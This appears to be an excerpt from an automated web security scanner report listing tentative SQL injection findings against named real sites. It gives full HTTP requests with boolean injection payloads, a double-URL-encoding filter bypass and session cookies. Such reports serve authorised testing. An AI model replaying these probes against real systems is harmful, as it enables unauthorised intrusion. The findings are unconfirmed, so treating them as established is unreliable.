Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets/multiwidget3/TA99172217'%20or%201%3d1--%20/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets/multiwidget3/TA99172217' or 1=1-- /FM-NEWS on this server.</p> </body></html>
Request 2
GET /widgets/multiwidget3/TA99172217'%20or%201%3d2--%20/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Server: Apache X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 X-Runtime: 0.03963 ETag: "5b4aa92de6e82aba561068d98e1e5f96" Status: 200 OK Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: private, must-revalidate, max-age=0 Date: Mon, 02 May 2011 12:46:27 GMT Connection: close Content-Length: 98246
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <title></title> <style type="text/css"> /*********************** * * Eric Meyer reset 15 Jan 2008 * ***********************/ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent} body {line-height: 1} ol, ul {list-style: none} blockquote, q {quotes: none} /* remember to define focus styles! */ :focus {outline: 0} /* remember to highlight inserts somehow! */ ins {text-decoration: none} del {text-decoration: line-through} /* tables still need 'cellspacing="0"' in the markup */ table {border-collapse: collapse; border-spacing: 0} /* ** ** Multi-widget styles ** */ #multiwidget {width:300px;background:#fff;font-family:helvetica;margin:0px auto;text-align:center;} h1 {padding:5px;margin:0;color:#333;font-size:18px;background-color:#c5e60e;color:#555;} .curve-tr-25 {-webkit-border-top-right-radius:25px;-moz-border-radius-topright:25px;border-top-right-radius:25px;} #activity-indicator {margin:100px 0 0 0;} h4 {width:74px;height:28px;background-color:#cc3000;color:#fff;font-size:12px;} h3 {height:25px;display:block;} h3 a {display:block;height:15px;width:80px;background: transparent url(/images/sprite-png-domainwidget.png) no-repeat -150px -60px;float:righ ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 19292364'%20or%201%3d1--%20 and 19292364'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets/multiwidget3/TA/FM-NEWS19292364'%20or%201%3d1--%20 HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets/multiwidget3/TA/FM-NEWS19292364' or 1=1-- on this server.</p> </body></html>
Request 2
GET /widgets/multiwidget3/TA/FM-NEWS19292364'%20or%201%3d2--%20 HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
/** * Returns a <code>Boolean</code> indicating whether or not the user agent represents a smart phone. * * @return True if the user agent represents a smart phone; otherwise false. */ function isSmartPhone() { var userAgent = navigator.userAgent return ((matchesSmartPhoneUserAgentRegularExpressions(userAgent)) && (!matchesTabletUserAgentRegularExpressions(userAgent))); }
/** * Returns a <code>Boolean</code> indicating whether or not the specified user agent represents a smart phone. * If any of the regular expressions are updated then they should be updated in * <code>SmartPhoneHelper.java</code>.
...[SNIP]...
1.19. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://mozo-widgets.f2.com.au
Path:
/widgets/multiwidget3/TA/FM-NEWS
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 31488663%20or%201%3d1--%20 and 31488663%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets/multiwidget3/TA/FM-NEWS?131488663%20or%201%3d1--%20=1 HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets/multiwidget3/TA/FM-NEWS on this server.</p> </body></html>
Request 2
GET /widgets/multiwidget3/TA/FM-NEWS?131488663%20or%201%3d2--%20=1 HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Server: Apache Last-Modified: Mon, 02 May 2011 11:50:25 GMT ETag: "17c8024-17eeb-a10ae240" Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: text/html Date: Mon, 02 May 2011 12:45:34 GMT Connection: close Content-Length: 98027
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <title></title> <style type="text/css"> /*********************** * * Eric Meyer reset 15 Jan 2008 * ***********************/ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent} body {line-height: 1} ol, ul {list-style: none} blockquote, q {quotes: none} /* remember to define focus styles! */ :focus {outline: 0} /* remember to highlight inserts somehow! */ ins {text-decoration: none} del {text-decoration: line-through} /* tables still need 'cellspacing="0"' in the markup */ table {border-collapse: collapse; border-spacing: 0} /* ** ** Multi-widget styles ** */ #multiwidget {width:300px;background:#fff;font-family:helvetica;margin:0px auto;text-align:center;} h1 {padding:5px;margin:0;color:#333;font-size:18px;background-color:#c5e60e;color:#555;} .curve-tr-25 {-webkit-border-top-right-radius:25px;-moz-border-radius-topright:25px;border-top-right-radius:25px;} #activity-indicator {margin:100px 0 0 0;} h4 {width:74px;height:28px;background-color:#cc3000;color:#fff;font-size:12px;} h3 {height:25px;display:block;} h3 a {display:block;height:15px;width:80px;background: transparent url(/images/sprite-png-domainwidget.png) no-repeat -150px -60px;float:right;text-indent:-999em;} ul.tabs {margin:0;padding:0;overflow:hidden;background-color:#c5e60e;} ul.tabs li { ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16009845'%20or%201%3d1--%20 and 16009845'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets16009845'%20or%201%3d1--%20/multiwidget3/WAT/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets16009845' or 1=1-- /multiwidget3/WAT/FM-NEWS on this server.</p> </body></html>
Request 2
GET /widgets16009845'%20or%201%3d2--%20/multiwidget3/WAT/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 X-Runtime: 0.02570 Status: 404 Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Date: Mon, 02 May 2011 12:46:42 GMT Connection: close Content-Length: 36120
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <meta name="keywords" content="Mozo, money info zone, information, bank reviews"/><meta name="description" content="Find products by provider with Mozo. Read reviews about providers, or write your own review about provider."/><title>Mozo - Compare Credit Cards, Home Loans, Term Deposits and more</title> <meta name="robots" content="noydir" /> <meta name="robots" content="noodp" /> <link rel="canonical" href="http://mozo.com.au/widgets16009845' or 1=2-- /multiwidget3/WAT/FM-NEWS">
<script type="text/javascript"> var logged_in = false; var searchType = ''; //var providerNames; // = []; </script>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 80339781'%20or%201%3d1--%20 and 80339781'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets/multiwidget380339781'%20or%201%3d1--%20/WAT/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets/multiwidget380339781' or 1=1-- /WAT/FM-NEWS on this server.</p> </body></html>
Request 2
GET /widgets/multiwidget380339781'%20or%201%3d2--%20/WAT/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 Status: 404 Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Date: Mon, 02 May 2011 12:46:59 GMT Connection: close Content-Length: 36120
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <meta name="keywords" content="Mozo, money info zone, information, bank reviews"/><meta name="description" content="Find products by provider with Mozo. Read reviews about providers, or write your own review about provider."/><title>Mozo - Compare Credit Cards, Home Loans, Term Deposits and more</title> <meta name="robots" content="noydir" /> <meta name="robots" content="noodp" /> <link rel="canonical" href="http://mozo.com.au/widgets/multiwidget380339781' or 1=2-- /WAT/FM-NEWS">
<script type="text/javascript"> var logged_in = false; var searchType = ''; //var providerNames; // = []; </script>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 12878514'%20or%201%3d1--%20 and 12878514'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets/multiwidget3/WAT12878514'%20or%201%3d1--%20/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets/multiwidget3/WAT12878514' or 1=1-- /FM-NEWS on this server.</p> </body></html>
Request 2
GET /widgets/multiwidget3/WAT12878514'%20or%201%3d2--%20/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Server: Apache X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 X-Runtime: 0.04091 ETag: "c75d435ba4c28ba01dac0272b2847b01" Status: 200 OK Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: private, must-revalidate, max-age=0 Date: Mon, 02 May 2011 12:47:12 GMT Connection: close Content-Length: 98258
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <title></title> <style type="text/css"> /*********************** * * Eric Meyer reset 15 Jan 2008 * ***********************/ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent} body {line-height: 1} ol, ul {list-style: none} blockquote, q {quotes: none} /* remember to define focus styles! */ :focus {outline: 0} /* remember to highlight inserts somehow! */ ins {text-decoration: none} del {text-decoration: line-through} /* tables still need 'cellspacing="0"' in the markup */ table {border-collapse: collapse; border-spacing: 0} /* ** ** Multi-widget styles ** */ #multiwidget {width:300px;background:#fff;font-family:helvetica;margin:0px auto;text-align:center;} h1 {padding:5px;margin:0;color:#333;font-size:18px;background-color:#c5e60e;color:#555;} .curve-tr-25 {-webkit-border-top-right-radius:25px;-moz-border-radius-topright:25px;border-top-right-radius:25px;} #activity-indicator {margin:100px 0 0 0;} h4 {width:74px;height:28px;background-color:#cc3000;color:#fff;font-size:12px;} h3 {height:25px;display:block;} h3 a {display:block;height:15px;width:80px;background: transparent url(/images/sprite-png-domainwidget.png) no-repeat -150px -60px;float:righ ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 67737725'%20or%201%3d1--%20 and 67737725'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets/multiwidget3/WAT/FM-NEWS67737725'%20or%201%3d1--%20 HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets/multiwidget3/WAT/FM-NEWS67737725' or 1=1-- on this server.</p> </body></html>
Request 2
GET /widgets/multiwidget3/WAT/FM-NEWS67737725'%20or%201%3d2--%20 HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
/** * Returns a <code>Boolean</code> indicating whether or not the user agent represents a smart phone. * * @return True if the user agent represents a smart phone; otherwise false. */ function isSmartPhone() { var userAgent = navigator.userAgent return ((matchesSmartPhoneUserAgentRegularExpressions(userAgent)) && (!matchesTabletUserAgentRegularExpressions(userAgent))); }
/** * Returns a <code>Boolean</code> indicating whether or not the specified user agent represents a smart phone. * If any of the regular expressions are updated then they should be updated in * <code>SmartPhoneHelper.java</code>.
...[SNIP]...
1.24. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://mozo-widgets.f2.com.au
Path:
/widgets/multiwidget3/WAT/FM-NEWS
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 99435588%20or%201%3d1--%20 and 99435588%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets/multiwidget3/WAT/FM-NEWS?199435588%20or%201%3d1--%20=1 HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets/multiwidget3/WAT/FM-NEWS on this server.</p> </body></html>
Request 2
GET /widgets/multiwidget3/WAT/FM-NEWS?199435588%20or%201%3d2--%20=1 HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Server: Apache Last-Modified: Mon, 02 May 2011 11:51:26 GMT ETag: "17c809e-17efa-a4adab80" Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: text/html Date: Mon, 02 May 2011 12:46:24 GMT Connection: close Content-Length: 98042
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <title></title> <style type="text/css"> /*********************** * * Eric Meyer reset 15 Jan 2008 * ***********************/ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent} body {line-height: 1} ol, ul {list-style: none} blockquote, q {quotes: none} /* remember to define focus styles! */ :focus {outline: 0} /* remember to highlight inserts somehow! */ ins {text-decoration: none} del {text-decoration: line-through} /* tables still need 'cellspacing="0"' in the markup */ table {border-collapse: collapse; border-spacing: 0} /* ** ** Multi-widget styles ** */ #multiwidget {width:300px;background:#fff;font-family:helvetica;margin:0px auto;text-align:center;} h1 {padding:5px;margin:0;color:#333;font-size:18px;background-color:#c5e60e;color:#555;} .curve-tr-25 {-webkit-border-top-right-radius:25px;-moz-border-radius-topright:25px;border-top-right-radius:25px;} #activity-indicator {margin:100px 0 0 0;} h4 {width:74px;height:28px;background-color:#cc3000;color:#fff;font-size:12px;} h3 {height:25px;display:block;} h3 a {display:block;height:15px;width:80px;background: transparent url(/images/sprite-png-domainwidget.png) no-repeat -150px -60px;float:right;text-indent:-999em;} ul.tabs {margin:0;padding:0;overflow:hidden;background-color:#c5e60e;} ul.tabs li { ...[SNIP]...
The keyword parameter appears to be vulnerable to SQL injection attacks. The payloads 18878509'%20or%201%3d1--%20 and 18878509'%20or%201%3d2--%20 were each submitted in the keyword parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The datr cookie appears to be vulnerable to SQL injection attacks. The payloads 14576993'%20or%201%3d1--%20 and 14576993'%20or%201%3d2--%20 were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The datr cookie appears to be vulnerable to SQL injection attacks. The payloads 33325718'%20or%201%3d1--%20 and 33325718'%20or%201%3d2--%20 were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /profile HTTP/1.1 Host: www.glam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3%2527; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;
Response 1
HTTP/1.1 502 Bad Gateway Content-Type: text/html Expires: Mon, 02 May 2011 14:33:46 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 14:33:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107
<html><body><h1>502 Bad Gateway</h1> The server returned an invalid or incomplete response. </body></html>
Request 2
GET /profile HTTP/1.1 Host: www.glam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3%2527%2527; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;
Response 2
